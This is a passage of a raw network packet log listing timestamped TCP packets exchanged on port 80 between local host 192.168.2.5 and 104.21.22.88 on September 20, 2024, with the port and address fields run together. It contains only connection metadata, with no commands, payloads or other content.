                                                              Sep 20, 2024 12:00:06.085758924 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085771084 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085788965 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085798979 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085805893 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085820913 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085835934 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085839987 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085850954 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085863113 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085866928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085884094 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085891008 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085900068 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085916042 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085916996 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085935116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085949898 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085957050 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085966110 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085980892 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085988045 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085997105 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086019993 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.086024046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086041927 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086056948 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086066008 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.086074114 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086097956 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086112976 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086122990 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.086127996 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086137056 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.086146116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086160898 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086167097 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.086177111 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086193085 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086205006 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.086209059 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086225986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086232901 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.086244106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086260080 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086266041 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.086301088 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086318970 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.086322069 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.086365938 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.175146103 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175491095 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175549030 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175565958 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175581932 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175599098 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.175606966 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175622940 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175637960 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.175640106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175657034 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175658941 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.175683022 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.175683975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175700903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175715923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175731897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175731897 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.175748110 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175771952 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175770998 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.175796986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175813913 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175828934 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175843954 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175858021 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.175858974 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175874949 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175880909 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.175899029 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175915003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175920010 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.175930023 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175945997 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.175956011 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.175976992 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.175992966 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176007986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176023006 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176038027 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176039934 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176063061 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176069021 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176079988 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176095963 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176110983 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176112890 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176139116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176146984 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176155090 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176172018 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176184893 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176187038 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176213026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176220894 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176229000 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176245928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176259041 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176259995 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176276922 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176291943 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176292896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176309109 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176326036 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176328897 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176342964 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176352978 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176359892 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176386118 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176398039 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176402092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176419020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176434040 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176444054 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176461935 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176474094 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176479101 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176496029 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176511049 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176517963 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176526070 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176536083 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176543951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176559925 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176582098 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176593065 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176604033 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176609993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176626921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176641941 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176655054 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176656008 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176671982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176687956 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176691055 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176703930 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176718950 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176728964 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176738024 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176747084 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176754951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176775932 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176790953 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176805019 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176809072 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176820993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176829100 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176839113 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176846981 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176856041 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176872015 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176887035 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176887989 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176904917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176918983 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176937103 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176949024 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176959038 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.176966906 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176983118 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176999092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.176999092 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177016020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177031994 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177042007 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177057981 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177067995 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177074909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177090883 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177107096 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177107096 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177123070 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177136898 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177138090 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177155018 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177162886 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177170038 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177186012 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177201033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177203894 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177217007 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177232027 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177238941 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177248001 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177258968 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177265882 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177282095 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177299023 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177299976 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177315950 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177330971 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177331924 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177346945 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177349091 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177364111 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177380085 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177392960 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177395105 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177412033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.177428961 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177453995 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.177494049 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.265198946 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265518904 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265542030 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265558004 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265573025 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265590906 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265607119 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265621901 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265628099 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.265636921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265652895 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265667915 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265682936 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265698910 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265702009 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.265718937 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265733957 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265749931 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265760899 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.265779972 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.265796900 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.265811920 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265845060 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265867949 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265882969 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265897989 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265908957 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.265914917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265930891 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265933037 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.265933037 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.265948057 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265960932 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.265964985 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265981913 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.265995979 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266010046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266022921 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266036987 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266052961 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266068935 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266084909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266093016 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266110897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266115904 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266124964 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266140938 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266155005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266164064 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266180992 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266185999 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266206026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266222000 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266223907 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266237974 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266252041 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266268969 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266273022 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266283989 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266297102 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266299963 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266315937 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266329050 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266333103 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266349077 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266355038 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266366005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266381025 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266396999 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266408920 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266412020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266428947 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266429901 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266443968 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266458988 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266462088 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266474962 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266488075 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266493082 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266510010 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266519070 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266541004 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266552925 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266565084 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266581059 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266602993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266619921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266621113 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266634941 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266644955 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266653061 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266669035 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266684055 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266689062 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266699076 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266710997 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266727924 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266742945 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266750097 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266760111 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266776085 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266786098 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266808033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266818047 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266823053 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266841888 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266858101 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266868114 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266882896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266899109 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266904116 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266913891 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266930103 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266943932 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266949892 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266966105 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.266969919 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.266982079 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.267009020 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.267014027 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.267030954 CEST8049724104.21.22.88192.168.2.5
